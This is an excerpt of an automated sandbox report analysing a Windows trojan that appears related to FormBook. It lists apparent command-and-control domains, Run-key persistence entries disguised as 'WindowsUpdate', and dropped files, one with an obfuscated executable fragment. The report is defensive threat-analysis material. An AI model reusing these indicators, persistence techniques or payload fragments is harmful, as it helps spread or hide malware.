                                                                                http://www.01595.xyzReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.microexplorer.exe, 00000011.00000000.1636210776.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000000.1638149848.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000000.1638134977.0000000007710000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.ybokiesite.online/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.heheartofthehome.net/o52o/www.inecraftpuro.netexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.anion.app/o52o/www.ybokiesite.onlineexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://wns.windows.com/EM0explorer.exe, 00000011.00000000.1641297778.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.inecraftpuro.net/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.infeng01.xyz/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.eusvexk.shop/o52o/www.indseniorjob881.clickexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.mewtcp.xyzexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.inlinlong.top/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.heiritforum.buzz/o52o/explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.lladinco.onlineReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.1r1f9bnfo4s4.topexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.1r1f9bnfo4s4.topReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.lladinco.online/o52o/explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.heheartofthehome.netReferer:explorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.inlinlong.top/o52o/www.reon-network.xyzexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://ns.adobeSexplorer.exe, 00000011.00000000.1636922085.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2632812909.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.inecraftpuro.net/o52o/www.mewtcp.xyzexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.ybokiesite.onlineexplorer.exe, 00000011.00000002.2647007270.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2285177622.000000000C127000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286984867.000000000C127000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            No contacted IP infos

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1549399
                                                                                                            Start date and time:2024-11-05 15:56:11 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 11m 6s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:39
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:1
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:M1Y6kc9FpE.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:a1cafe0d39cc17c0e36db2afdb4f640e3e81da7b2302c01e03c96348723ffdc9.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.evad.winEXE@1671/57@6/0
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 98%
                                                                                                            • Number of executed functions: 180
                                                                                                            • Number of non-executed functions: 220
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                            • VT rate limit hit for: M1Y6kc9FpE.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            09:57:22API Interceptor1x Sleep call for process: M1Y6kc9FpE.exe modified
                                                                                                            09:58:01API Interceptor1222017x Sleep call for process: explorer.exe modified
                                                                                                            09:58:09API Interceptor1651126x Sleep call for process: ipconfig.exe modified
                                                                                                            15:57:29AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
                                                                                                            15:57:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
                                                                                                            15:57:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            No context

                                                                                                            Domains

                                                                                                            No context

                                                                                                            ASNs

                                                                                                            No context

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                                                                                              Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                                                DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse
                                                                                                                  qZkywW6Q0b.exeGet hashmaliciousFormBookBrowse
                                                                                                                    AlBXxWizEX.msiGet hashmaliciousDanaBotBrowse
                                                                                                                      mEudzoO1bG.exeGet hashmaliciousFormBookBrowse
                                                                                                                        HoGsuqrMLl.exeGet hashmaliciousFormBookBrowse
                                                                                                                          doc000000037294.exeGet hashmaliciousFormBookBrowse
                                                                                                                            doc000000037294.exeGet hashmaliciousFormBookBrowse
                                                                                                                              KKKK.htaGet hashmaliciousUnknownBrowse
                                                                                                                                C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                                                                    DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      qZkywW6Q0b.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        AlBXxWizEX.msiGet hashmaliciousDanaBotBrowse
                                                                                                                                          mEudzoO1bG.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            HoGsuqrMLl.exeGet hashmaliciousFormBookBrowse
                                                                                                                                              doc000000037294.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                doc000000037294.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  KKKK.htaGet hashmaliciousUnknownBrowse

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\ahpskwthu.docx

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):526
                                                                                                                                                    Entropy (8bit):5.56088650926032
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OR8GBPduc+twADhqd2jhdyub7zKMg0JVy0:OR8GLucahPLy6/KMg10
                                                                                                                                                    MD5:56AE97A5897D70A0C7FADE5F29767A43
                                                                                                                                                    SHA1:E6ED9186AB3B3211092508F8E4FBE46E058839F7
                                                                                                                                                    SHA-256:96F922028E5673AF15F9AF520BA2F01496FEFB7D6017B82B29946D2E09351704
                                                                                                                                                    SHA-512:7CFFA2028FDF0CB5F659C644F666A426ADED46D06020FAF6DA8CF768F80960B6DB02CDFA958EE6F746466F426D7420520980E34F33A0CFA07950EDC1735016A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:619533KU8JDc44Q81610b78c31412CUd96dN3177U3E4z7O0M53180I..ColorConstants GuiDateTimePicker..8s51L174dbL235j5NAT7oKX537K9ez..ComboConstants TreeViewConstants..484LG864994b3s9u996vRGiy882YR8Ql7eb39i47865JcAN39mMN97C35oGoUQ8P2U61492LfnxY5pc1Oe0ip52D8Y0a5aI32545I4ZEVSV5QUUxKrG59848Z71G02750F0t91H82UH63Cln54fI8pX..ButtonConstants FileConstants..Z741s9vKlJ3y1W7J323l2i8IQ440cK38824714855Ne5dnyL7mo6r9zM1kl14Q880A0LR71L4jH22346ch7h67r664378E7901S9SO793k500tw3M16ZX173hZdmAgpVE60hJNnjAK0PQ356Av5X2..ToolTipConstants BorderConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\aiccixqlw.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.530545679464256
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:mdCqOBPbyICH8jQLa77pTdenxfGDCDL0HbBPkV4udLzH:B9CcjQu77pT410qqbOVvLzH
                                                                                                                                                    MD5:68925419289F46D376B8D0DE41A64C99
                                                                                                                                                    SHA1:9C876267E22ACB8881C7FCFC9006D97813822C95
                                                                                                                                                    SHA-256:1449B0AEFAB21761CD54949134B02FFB7042ED3FB91E36032991922199722EC7
                                                                                                                                                    SHA-512:E6E5A5498ADA1E845AD2907FE040ED69CDAC03F43702F21C8E11A666CBB4D9845AD8D6E7CFC078D2FC54B0190D261B90A580338279C94CC9B79DA4751727EDF2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:K3kBK4Brv7699pv89D87UW42M70a7tAyn..DateTimeConstants TreeViewConstants..2A0b3537B85k5mg5J3KthMc8jr7A..ToolbarConstants BorderConstants..366558cyh1ckV7NHdy2La3J35494L6oO50328EYyc86dZYG11W08PnL1d4J4PAd405x57F086cGBmgN003723k4j145283K6cd112sWH111r..ToolTipConstants ComboConstants..713RWX5R5n348I565sos8455wmqT684Gw5OABhPeCHi67u6w9R11435m000f9f34509570j0N67e..ComboConstants TreeViewConstants..43477G9032d5472K924x40y1Rxmy9jcaO1HM5p654t8X31zr60933r63y035BBP467MoM421Dg8Jv6q10U0G04X911r2O1d538D4npkbza909LF420Tj4okZd9WCM0Qj20dB9A06G028T97fJE8F9lJ..ToolTipConstants UpDownConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\amfmrpfqdh.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35713
                                                                                                                                                    Entropy (8bit):5.5757639550354
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:nPAvrzduvmfWP09cb22tqThZeLkujscEppQ7/UBD7sP5a:YD5uvmC09BThBlcQQda
                                                                                                                                                    MD5:F8EC3A47A92F1C45B9F6582F7CF621C1
                                                                                                                                                    SHA1:452FB70C325BA60247ECF3EB7C05C188E576CC60
                                                                                                                                                    SHA-256:771DB32E8BDD02BE6AC90F3D0902D08163C3F49CBF21F46B069BD8DA32ED0C74
                                                                                                                                                    SHA-512:DBA6D256838DCD1A30E68C35BBC5E11B51B6AA05BFECC437EF70B67B8B89A05B9865F92C90AEBC51F76832F8137EF28C4A11BDAA112519BD0419D18699937764
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:3754G5..D05169NtTJ45cn0w69855AVY75L585Yh3PD01hx7NuUWz0oOI0ONrb0V2Tn348CY6i57KXkg1c12T12ytn0..z4D028M773ydLB65HgDX9t6Ws3q23I5tX..p10995248Bhw6G2G2zn46cV4v04zjP8Yf4x4n1H1T9YWWU146QM23WxJ..h15v3732TLP700AgdCoSmv3tCvU16zhjV9Dx2opx0ZNW..22oYE8803d96e9qZXKG7fOU6ukk22C6mu..p3o37N97Q8jI40535bk5IShKy0x0Pz46z8K04417UGX5PECCex9Q7o0ZxR3xhpA58a3rnJ..v4YCI2UR5P80h237CA42Av893W6m4y63K0XF7sBrKHo5K163W0HZ7boNY1ZZ56PQ5Loy7YE8..857853y271Pn501qD4D9SM136PC198w03k4ty4N0GaeW9vk8UjZ4iE455D8..1CA6mUn75a671x0Qj7OXZy7F807569Y49b7926..113W8z91076L2o9338i82hgE5UYB6EEtD34212886gk6No9W..0T87jH6u3k5b60o1K4f994x7C1z8qfzQ14..762b033d8T68U1620b49I8cb3DHQOh5k531BU3bd65hWRO247z07SN2c75M18OG922o6i6kK3844625DW3Jsut9..DAiWrw22OkU501BXB24AR48xlvzuKpsl05Q9U464g0yDO0P96..AbBw0t4ab1J2f8qBfSC6OAMjc5UF96..0h06n144Bp55H0o2O819cwv73BUl42518O80T4kuXC7V6HL3kQY3vb..28317cjBEjGvS..T2U8MjP24244XElrq7ePm98UWhX00307N305b9AXnX4r0d9ywrC19V58880y60..M0E6J611p2VGwHTIY6x21oCf72K12486Wz0420L3357JQh..7982l3987r7XHDg6YZ8897z8451m558tu1kA1262D6448

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\bhbdl.dll

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):579
                                                                                                                                                    Entropy (8bit):5.59314018146621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:hKfrpxtEBNTNHmRPQdSqdAFAPN78YuuSdwZpyPh:KrmHZmRPQdaFtV4Q
                                                                                                                                                    MD5:F3372B55E755A70E9D39941A8AF77BD7
                                                                                                                                                    SHA1:164A9D56BDE91BF883F9A97D4203689C4EC13D5E
                                                                                                                                                    SHA-256:FBFD9CD1320C29A7AD37207A415D1503F686185F901299EA0870420B8A4A66AE
                                                                                                                                                    SHA-512:7CB1031AEDE051EB28BE6E72BAD4C66A5CAEA5C089BB73C2D2268F9D3DB8B1412C15383E8A68760F1AFE276B0B0A0901A4ED07A1DA1C0A04943CA5DCD7DE3CA6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:844SM564629y802766Z1XNg6MR4681P751fibf171Z581Uy65IU6SD8xsBDv7U7J2WjQ3Z74f29CcYCo240J5wT5Bz2o862s9D9qFF9E8t7h83W1ZO..GuiDateTimePicker ToolTipConstants..AN5ZfHq416b6E2XgvK1E561bB11VQ6IZ198ofDr944XP6du8fjoC4VB72LH1913Py4087574170165IO5293i..ComboConstants ButtonConstants..U356440fZ85EGkjZuv05YXE3E8VIq2qg3V80659..TreeViewConstants ComboConstants..62L06cgDIEJlL33xBk7KO1yILx3H8850E7A00z2464T802O1S73m7M678KilaCj800LR488J3pVuie39bp6558878w45Y243g4..FontConstants ColorConstants..e1k546N4K0853Imq24466jpDWLf070kzn7YuD3I1O2N17aD95802498361LK9u24lS0i..TreeViewConstants FileConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\btieiqt.wxc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):360301
                                                                                                                                                    Entropy (8bit):4.03500126803888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:ODNuvLVuBeU1elwm4CaOYIIFdGuOqmM3iRVb1:2QT+RdiqW9
                                                                                                                                                    MD5:FAE6EE35C0F5AC2DC4885C0DE8E88032
                                                                                                                                                    SHA1:587BF6F4105D4420762C463BA33E9E3BA677E85F
                                                                                                                                                    SHA-256:4DB090B6F1CD2501C929B31C2E29D4D0A4DDF1E81BE6800E763D8C45BEA8744D
                                                                                                                                                    SHA-512:1CE62D900017DD4545023ACC3CA32DAEE7EB454A6144C99958D57E88838402013854F410B8BE1FB5D607819C48BA72FEFECC11D2C78A81408855BF3899E04B38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:0x4D5*4552E8]]]]5883E8098_C883C03C8_]03C/83C0280308FFE/9]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0C]]]]E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]*_FC08E*EF9D66_9EF9D66_9EF9D66_9F4]CD_9*99D66_9F4]F8_9EC9D66_9F4]F__9EE9D66_952696368EF9D66_9]]]]]]]]]]]]]]]]5045]]4C0/0/]/E6*6752]]]]]]]]E]]20/0_0/0*]]D202]]]]]]]]]D0F]/]]/]]]0F]2]]]4]]0/]]]]2]]05]0/]]]]]05]0/]]]]]]F]2]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]34D/02]]/]]]0D202]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\bvqmcwxut.docx
